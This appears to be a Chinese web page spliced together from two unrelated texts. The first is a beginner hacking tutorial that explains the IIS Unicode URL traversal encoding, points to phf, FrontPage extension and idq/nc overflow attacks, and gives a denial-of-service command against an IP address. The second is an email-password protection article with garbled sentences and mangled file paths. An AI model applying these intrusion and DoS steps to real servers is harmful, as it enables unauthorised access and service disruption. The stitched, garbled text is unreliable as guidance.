现在网上有许多好心的大虾都给你修改编译好了，你直接找来用就行。但。。。。。不想多学点东西么？

好了，不罗嗦了：）

先看看构造特殊url：（以Unicode为例）

什么是Unicode?

Unicode漏洞是因为在Unicode编码中，有这样一个编码方式%c1%hh %c0%hh (0x00〈= 0xhh 〈 0x40) 等等，

而该死的IIS 却是这样理解的：把“%c1%hh" 解释成(0xc1 -0xc0) * 0x40 + 0xhh

结果就有了这样的组合：

%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'

%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'

通过这两个小小的“/”“\”，我们就可以构造特殊URL来深入到系统的根目录了，看看下图：

url1

url2

url3

这只是个简单的例子，用URL的还有的是，比如phf漏洞：

可以构造

在比如： 等等

域名是随便写的，勿对号入座哦

暴利破解，简单探测，我在第一篇教程中就说了，自己找找看看。

我们来说利用系统服务溢出的：

输入法漏洞需要WIN2K 终端，终端成了hacker工具：）

Frontpage 扩展，需要Frontpage ， 作网页的东西也成了黑客工具：）

Frontpage 扩展攻击： 启动Frontpage － 文件 － 打开站点 － 输入站点的IP ，如果要口令就输入得到的口令，免费给人家设计的主页吧 ：）

是不是很简单呢？

看看溢出：

这个是图形的，很简单，其实溢出程序多是命令行的。

idq

nc

对方存在shtml.dll这个漏洞，如何攻击呢？

先找找关于漏洞的说明，然后找相关的程序，比如我用的：

dos.exe 211.21.22.11 对方IIS 拒绝服务了 ，当掉 ！

会了么？

好了，你应该学到点什么了，准确的说你应该发现点什么了。发现什么了呢？

1、凡是涉及到概念基础的时候，你潜意识中是跳过去不愿意看的。

2、攻击多是用现成的工具实现的。用工具当然没什么不好，但你知道当溢出时，为什么要用nc监听本地端口么？

我所讲的攻击实例其实是为了满足你的好奇心而已，希望你能看得更深一点：）

怎么防止163邮箱被盗

防止邮箱密码破解的方法？

一，如何破解邮箱密码已经成为我们网络生活或者是网上办公的重要手段，特别是进行网上办公，电子邮件的安全性尤其重要，介于电子邮件的安全我们也曾采用过许多方法，对电子邮件的安全也起到了很大的作用。除了一些比较常用的方法之外，其实还有一些方法需要我们去挖掘。这里就介绍几种不被许多用户知道的，不常用的电子邮件安全处理方法。可以有效防止自己的邮箱密码破解。

1.加密个人文件夹 ,保护邮箱密码

其实不管是发出的邮件还是收到的邮件都是存放在一个文件夹当中的，和普通的文件夹一样，我们也可以对邮箱的个人文件夹设置邮箱密码，这对于多用户的操作系统来说更是重要。具体设置的方法是：开Outlook找到“个人文件夹 - Outlook今日”视窗（在默认情况下打开的就是这个界面），将鼠标移到“个人文件夹 - Outlook今日”上，点击右键，然后选择“个人文件夹”属性，在弹出的对话框中选择“高级”按钮，然后再在弹出的对话框中选择“更改邮箱密码”按钮，在弹出的“更改邮箱密码”对话框中输入旧邮箱密码和新邮箱密码就可以了 ，这样基本上你的邮箱密码就安全了。

2.过滤规则的使用

有一段时间，我在公司的专用邮箱由于没有使用一定的过滤规则，结果平均每天有几千封的垃圾邮件，害得我不得不从中来寻找几封有用的，加上网页翻页速度也不理想，真是把我给累坏了。不仅如此，有时候还会遇到垃圾邮件。其实不管是采用哪种邮箱都是可以通过设置过滤规则来对垃圾邮件进行限制的。 Outlook内建立过滤器的基本方法是：进入Outlook 2000，在“工具”菜单之下选择“规则向导”，打开“规则向导”的设置窗口。在右面一列的按钮中，按“新建”来增加新的邮件过滤规则，出现又一个“规则向导”对话框。在规则向导中，首先你要选择的就是在什么时候使用你将要定下的规则。一般我们选择“当邮件到达时检查”

然后单击“下一步保护邮箱密码”，在这里选择要检查条件，因为不少的垃圾邮件其实都不是直接寄给你，但又会收到，只要Outlook检查一下每一封邮件的收件人有没有你的邮件地址，便可以大概分辨出是否是垃圾。因此，在过滤邮件的条件中选择“我的名字不在收件人框中”，然后按“下一步”。

在这个界面中就要选择如何处理符合上述条件的邮件，一般情况下我们会选择将其移到指定的文件夹，当然如果你不需要也可以直接选择“永远删除”选项。若你只选“删除它”，Outlook 2000会把邮件放到垃圾箱，在垃圾箱的邮件是可以随时可以恢复的。而永远删除，则是直接删除，不能再取回。在“规则向导”的窗口下半部分有“规则描述”的一栏。点击最后一行“将其移动到指定文件夹”中带下划线的“指定”，在这里可以具体的选择移动到哪个文件夹。

按“下一步”，便可以按你自己的需要建立一些“例外”的规则。除非你想加“除非来自个人或通讯组列表”，否则直接按“下一步”就可以。最后给这规则起一个名便可以完成整个过程。这个规则向导除了对垃圾邮件有用之外，在对付病毒的问题上，亦可以起不少的作用。还可以设置让邮件到达时要进行检测，如果有病毒，一般来说只要我们不打开它，这病毒就起不了作用的。

3.备份邮箱密码资料，防止邮箱密码破解。

和系统和服务器一样，OE也可以对重要的资料进行备份邮箱密码，这样可以防止如何破解邮箱密码软件，以防在资料丢失或者是被破坏时，可以及时的恢复。默认情况下，OutlookExpress邮件的保存位置C:WINDOWSApplicationDataIdentitiesMicrosoftOutlookExpress文件夹，其中{}中的符号不是固定的，它跟不同用户的计算机环境的有关，将这个文件夹中的所有文件复制到E：mymail，然后在OE中单击“工具”菜单中的“选项”命令，在打开的“选项”设置窗口中选择“维护”标签，单击“存储文件夹”按钮，在弹出的“存储位置”窗口中单击“更改”按钮，指定存储位置E：mymail文件夹，最后单击“确定”按钮即可。同样的办法，我们可以对通讯簿进行转移，OutlookExpress的通讯簿文件保存在C:WINDOWSApplicationDataMicro-softAddressBook文件夹中，将

这个文件夹中的.wab文件复制到其他文件夹中如：E：mytx注册表编辑器，依次找到HKEY_CURRENT_USERSoftwareMicrosoftWABWAB4WabFileName子键分支，然后将其默认值更改为自己的文件夹E：mytx即可。

以上几步做到，基本可以防止自己邮箱密码不被破解了。

怎么批量修改企业邮箱密码？

通过管理员可以在后台进行统一修改。但是无法进行批量操作，这是为了邮箱安全的操作。